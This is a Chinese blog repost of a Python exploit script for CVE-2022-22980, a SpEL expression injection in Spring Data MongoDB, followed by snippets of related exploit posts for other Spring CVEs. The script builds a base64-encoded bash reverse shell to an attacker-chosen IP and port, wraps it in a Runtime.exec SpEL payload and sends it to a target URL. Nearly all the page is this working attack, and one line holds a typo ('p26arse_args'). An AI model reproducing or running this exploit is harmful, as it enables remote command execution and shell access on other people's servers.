首页 > 其他分享 >CVE-2022-22980

CVE-2022-22980

时间:2023-05-23 18:35:42浏览次数:46  
标签:22980 shell prot url ip args parser 2022 CVE

#CVE-2022-22980 Spring Data MongoDB SpEL表达式注入

import requests
import urllib
import base64
import argparse

def poc(url,ip,prot):
    urll=f'{url}/?name='
    shell=f'/bin/bash -i >& /dev/tcp/{ip}/{prot} 0>&1'
    shell=shell.encode('utf-8')
    shell=base64.b64encode(shell)
    shell=shell.decode('utf-8')
    payload="T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('bash -c {echo,"+shell+"}|{base64,-d}|{bash,-i}')"
    print(payload)
    data = payload.encode('utf-8')
    payload = urllib.parse.quote(data)
    requests.get(url=urll+payload,verify=False)


def main():
    parser=argparse.ArgumentParser(" python CVE-2022-22980.py -u http:192.168.56.200 -i 192.168.56.200 -p 1234")
    parser.add_argument('-u','--url',dest='url',help='输入漏洞url')
    parser.add_argument('-i','--ip',dest='ip',help='输入ip')
    parser.add_argument('-p','--prot',dest='prot',help='输入反弹端口')
    args=parser.p26arse_args()

    if args.url:
        poc(args.url,args.ip,args.prot)
    else:
        print('-h 帮助')


if __name__ == '__main__':
    main()

标签:22980,shell,prot,url,ip,args,parser,2022,CVE
From: https://www.cnblogs.com/crayonxiaoxin/p/17426056.html

相关文章

  • CVE-2022-22965
    #CVE-2022-22965:Spring远程代码执行importrequestsimportargparseimporttimeimportreimportbase64importurllib.parseheader={"Accept-Encoding":"gzip,deflate","Accept":"*/*","Accept-Languag......
  • CVE-2022-22963
    #SpringCloudFunctionSpEL代码注入(CVE-2022-22963)importrequestsimportargparseimportbase64headers={"Accept-Encoding":"gzip,deflate","Accept":"*/*","User-Agent":"Mozilla......
  • CVE-2022-22947
    #CVE-2022-22947:SpringCloudGateway远程代码执行importrequestsimportjsonimportsysimportbase64importargparseimportreurl1='/actuator/gateway/routes/hacktest'url2='/actuator/gateway/refresh'url3='/actuator/gateway/routes/......
  • JOISC 2022 题解
    JOISC2022Day1监狱Jail首先我们发现操作一定是给所有人排序,然后按照顺序直接从\(s_i\)挪到\(t_i\),要求是对于\(i\),所有在它之前挪的\(t\)不能在\(s_i\tot_i\)上,所有在它之后挪的\(s\)不能在\(s_i\tot_i\)上。有了这个条件我们就可以\(O(n^2)\)建图。但是这样......
  • 在 Windows Server 2022 中,微软取消了一些以前的功能。以下是一些被取消的功能
    在WindowsServer2022中,微软取消了一些以前的功能。以下是一些被取消的功能:InternetStorageNameService(iSNS):iSNS是一个网络服务协议,为iSCSI设备提供自动发现和配置。在WindowsServer2022中,iSNS被取消了,建议使用其他的自动发现和配置方法。PeerNameResolu......
  • 在Windows Server 2022中使用Microsoft Deployment Toolkit(MDT)时,Bootstrap.ini文件是
    在WindowsServer2022中使用MicrosoftDeploymentToolkit(MDT)时,Bootstrap.ini文件是用于启动和定制Windows预安装环境(WinPE)的关键文件。以下是常见的Bootstrap.ini参数及其描述:[Settings]:指定设置组。Priority:指定Bootstrap.ini的优先级,以确定哪个Bootstrap.ini文件将被使用(如......
  • Windows server 2022 个人使用 优化批处理batch
    Windowsserver2022个人使用一些优化@echooffregadd"HKLM\SOFTWARE\Microsoft\ActiveSetup\InstalledComponents\{A509B1A7-37EF-4b3f-8CFC-4F3A74704073}"/v"IsInstalled"/tREG_DWORD/d00000000/fregadd"HKLM\SOFTWARE\Microsof......
  • 在Windows Server 2022中使用Microsoft Deployment Toolkit(MDT)时,可使用Rules(规则)文件
    在WindowsServer2022中使用MicrosoftDeploymentToolkit(MDT)时,可使用Rules(规则)文件来配置和自定义部署过程。以下是常见的Rules参数及其描述:UserDomain:指定要加入的域的名称。UserID和UserPassword:指定加入域所需的管理员帐户凭据。TimeZoneName:指定安装期间使用的时区。Jo......
  • 【DSP视频教程】DSP视频教程第12期:TI开源分享IQmath DSP源码,适用于所有Cortex-M内核,本
    视频教程汇总帖:https://www.armbbs.cn/forum.php?mod=viewthread&tid=110519 今年TI推出MSPM0系列产品配套的SDK软件包里面将此库开源了,之前的时候也移植过IQmatb,不过只有库版本,这次竟然开源了,确实是不可多得的好资源。这个是定点库,非常适合用于M0,  M0+,  M3和不带硬件F......
  • Audition 2022 for Mac软件安装包下载Au 2022软件安装教程
    [名称]:Audition2022[大小]:493MB[语言]:简体中文 [安装环境]:MacOS10.15及以上[是否支持M系列芯片]:支持[简介]:Audition是一种完善工具集,其中包括用于对音频内容进行创建、混音和编辑的多音轨、波形和光谱显示。这一强大的音频工作站旨在加快视频制作工作流程和音频修整的速度,并且......